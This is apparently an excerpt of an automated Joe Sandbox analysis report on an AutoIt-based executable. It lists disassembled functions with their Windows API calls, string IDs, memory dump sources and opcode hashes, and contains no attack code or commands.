• Instruction ID: b8ef330422fb3be5a52e4ba40538d13bee08585bcdcd56b087dee1976e7968fb
• Opcode Fuzzy Hash: eed4dbad25c5d49d361ed7c6de48adf35c045f0f88f60ce4eae51cf7acef72ef
• Instruction Fuzzy Hash: 33E0D8353483057FF7310A51AC4AEA33F6CE759751F104026F3096D191DEA3CC117560
APIs
• SendMessageW.USER32(?,0000133D,?,?), ref: 005A5855
• InvalidateRect.USER32(?,?,00000001), ref: 005A5877
Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateMessageRectSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 909852535-2594219639
                                                                                                                        • Opcode ID: 09adaba7eded40b39f32081bef1c3b8c71db020025f96cb006f36e5660f1f45a
                                                                                                                        • Instruction ID: 070f7216fe2c3ffd443364afb8817ee189b8b209ad9d4437d1c0e154fbd18557
                                                                                                                        • Opcode Fuzzy Hash: 09adaba7eded40b39f32081bef1c3b8c71db020025f96cb006f36e5660f1f45a
                                                                                                                        • Instruction Fuzzy Hash: 9EF08232604140EEDB21CB69DC44FEEBFF8EB96321F0445B2E65ADE051E6308A85DB60
                                                                                                                        APIs
                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00570B23
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                        • Opcode ID: f12100749c351d9978d8bbec403c98053fb7ecd3bc5779e2906737399fcb70b7
                                                                                                                        • Instruction ID: 7e4c69ad8a3154ecb3eab911f476bee69323bb0faac76fd07e8a519cd20152dc
                                                                                                                        • Opcode Fuzzy Hash: f12100749c351d9978d8bbec403c98053fb7ecd3bc5779e2906737399fcb70b7
                                                                                                                        • Instruction Fuzzy Hash: 8AE0D8322443192AD31437547C07F8D7FC8FF06B20F10042BF758555C38EE1689056A9
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0052F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00530D71,?,?,?,0051100A), ref: 0052F7CE
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 00530D75
                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 00530D84
                                                                                                                        Strings
                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00530D7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                        • Opcode ID: aea7f27dbaea130a961ef3b5b8875058a0ec245fa07bdaa42d00e76bec545277
                                                                                                                        • Instruction ID: 928c34918856d7bb29dd197693750a8d2d268d4c437d567f50edcac5761334f2
                                                                                                                        • Opcode Fuzzy Hash: aea7f27dbaea130a961ef3b5b8875058a0ec245fa07bdaa42d00e76bec545277
                                                                                                                        • Instruction Fuzzy Hash: A8E06D742007518BD7609FB8E41834A7FE4BF15744F004D2DE4C2C6691DBB0E4889B91
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0052E3D5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: 0%^$8%^
                                                                                                                        • API String ID: 1385522511-2219163478
                                                                                                                        • Opcode ID: 9d555d80d306128dcd2a2438f01b95a601c879dab61278852ec3b23f3fed72d9
                                                                                                                        • Instruction ID: 109e54cbb7a2779ec71da4751c73cd58f25d60cdef7062a304f4a2b57a14564b
                                                                                                                        • Opcode Fuzzy Hash: 9d555d80d306128dcd2a2438f01b95a601c879dab61278852ec3b23f3fed72d9
                                                                                                                        • Instruction Fuzzy Hash: E9E02631400BB4CBC60CD718FAAAA8C3B99BF66321F1019AAE0828F1DDDBB038419654
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID: %.3d$X64
                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                        • Opcode ID: b8409e17d4200147f0b9e367c3f296fab4efbdfc5dee24edf01ed9c74ccb4cf2
                                                                                                                        • Instruction ID: 729f93c779faf7c5fefaa4e5baeb76e7960134e890187afc99c36b062005929c
                                                                                                                        • Opcode Fuzzy Hash: b8409e17d4200147f0b9e367c3f296fab4efbdfc5dee24edf01ed9c74ccb4cf2
                                                                                                                        • Instruction Fuzzy Hash: 08D012B9D08119EACB9096D0DC599B9BF7CBF19301F508C63F80693040E728C5086771
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005A236C
                                                                                                                        • PostMessageW.USER32(00000000), ref: 005A2373
                                                                                                                          • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 7b2092d33540409cbf0eaf3ec833ed144daefd482c603b64476492f20de3fcf9
                                                                                                                        • Instruction ID: ec4612f7faff35dbf9ca8e59b975b5bf59650b54b771ba011fdf326b28704b8e
                                                                                                                        • Opcode Fuzzy Hash: 7b2092d33540409cbf0eaf3ec833ed144daefd482c603b64476492f20de3fcf9
                                                                                                                        • Instruction Fuzzy Hash: 6DD0C9327813147AE674A774AC0FFC67E14AB6AB10F0049167755AA1D0C9A0A8059A54
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005A232C
                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005A233F
                                                                                                                          • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 0c05fbe7688509eec5cb5da9749bcd971773cbf62077507603128322a26c8ae8
                                                                                                                        • Instruction ID: 8de9d5149be15e572fdd04aa17f7a7b24b8beb12ead648874b83316531c9eaa7
                                                                                                                        • Opcode Fuzzy Hash: 0c05fbe7688509eec5cb5da9749bcd971773cbf62077507603128322a26c8ae8
                                                                                                                        • Instruction Fuzzy Hash: E8D0C936794314BAE674A774AC0FFC67E14AB66B10F0049167759AA1D0C9A0A8059A54
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0057231F
                                                                                                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 0057232D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 40800b604f8e04eae843b923f0ae506c64298675f4db6ec7430a61ff777a58cc
                                                                                                                        • Instruction ID: 96a1fef7ddbdc9e3ce532e4dde36162f6d309fd7f19fc1c223af3db7c9dbae44
                                                                                                                        • Opcode Fuzzy Hash: 40800b604f8e04eae843b923f0ae506c64298675f4db6ec7430a61ff777a58cc
                                                                                                                        • Instruction Fuzzy Hash: 32C04C311401C0BAF7315B6BBD0DD573E3DE7EBF51710115CB2159E0A58A650059E674